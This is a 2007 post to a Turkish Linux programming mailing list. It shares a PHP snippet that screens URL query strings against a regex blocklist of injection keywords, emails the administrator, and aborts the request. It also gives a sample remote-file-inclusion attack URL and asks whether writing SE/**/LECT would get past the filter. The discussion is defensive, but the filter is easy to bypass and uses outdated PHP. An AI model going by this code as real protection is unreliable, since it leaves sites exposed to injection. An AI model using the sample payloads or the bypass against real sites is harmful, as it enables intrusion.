From: huseyin mert (huseyinin@gmail.com)
Date: Mon 27 Aug 2007 - 09:35:37 EEST
<?php
// ====================================================================
//
// Avoid URL injection code. Easy to improve the security (phising, etc..)
// of all your site when if are calling one .php to centralize all your
// DB connections.
//
// mailto: Vicente<sysvic@gmail.com>
//
// ====================================================================
$req = $_SERVER['REQUEST_URI'];
$cadena = explode </manual/function.explode.php>("?", $req);
$mi_url = $cadena[0];
$resto = $cadena[1];
// here you can put your suspicions chains at your will. Just be careful of
// possible coincidences with your URL's variables and parameters
$inyecc=
'/script|http|<|>|%3c|%3e|SELECT|UNION|UPDATE|AND|exe|exec|INSERT|tmp/i';
// detecting
if (preg_match </manual/function.preg-match.php>($inyecc, $resto)) {
// make something, in example send an e-mail alert to administrator
$ip = $HTTP_SERVER_VARS["HTTP_CLIENT_IP"];
$forwarded = $HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"];
$remoteaddress = $HTTP_SERVER_VARS["REMOTE_ADDR"];
$message = "attack injection in $mi_url nnchain: $resto nn
from: (ip-forw-RA):- $ip - $forwarded - $remoteaddressnn
--------- end --------------------";
mail </manual/function.mail.php>("youremail@email.com",
"Attack injection", $message,
"From: host@{$_SERVER['SERVER_NAME']}",
"-fwebmaster@{$_SERVER['SERVER_NAME']}");
// message and kill execution
echo 'illegal url';
die();
}
// From here you can start safely your DB connection
$connection=mysql_connect </manual/function.mysql-connect.php>(); //..etc.
?>
Usage Example
* URL Attack:
http://www.mydomain.com/index.php?page=http://www.geocities.com/df_animes/tool25.txt?&cmd=w
* Response:
"illegal url"
* E-mail sent to administrator:
attack injection in /home/mydomain/public_html/index.php
chain: /index.php?page=http://www.geocities.com/df_animes/tool25.txt?&cmd=w
from: (ip-forw-RA): - - 85.50.130.156
-----------------------------------------------------------
orjinal adresi:http://www.zend.com/code/codex.php?id=1543&single=1
zend de bulduğum bir kod çok hoşuma gitti acaba ne kadar güvenlik sağlar
diye fikirlerinizi bekliyorum.
ilk olarak aklıma gelen SELECT yerine SE/**/LECT yazarak geçilip
geçilemeyeceği?
_______________________________________________
Linux-programlama mailing list
Linux-programlama@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-programlama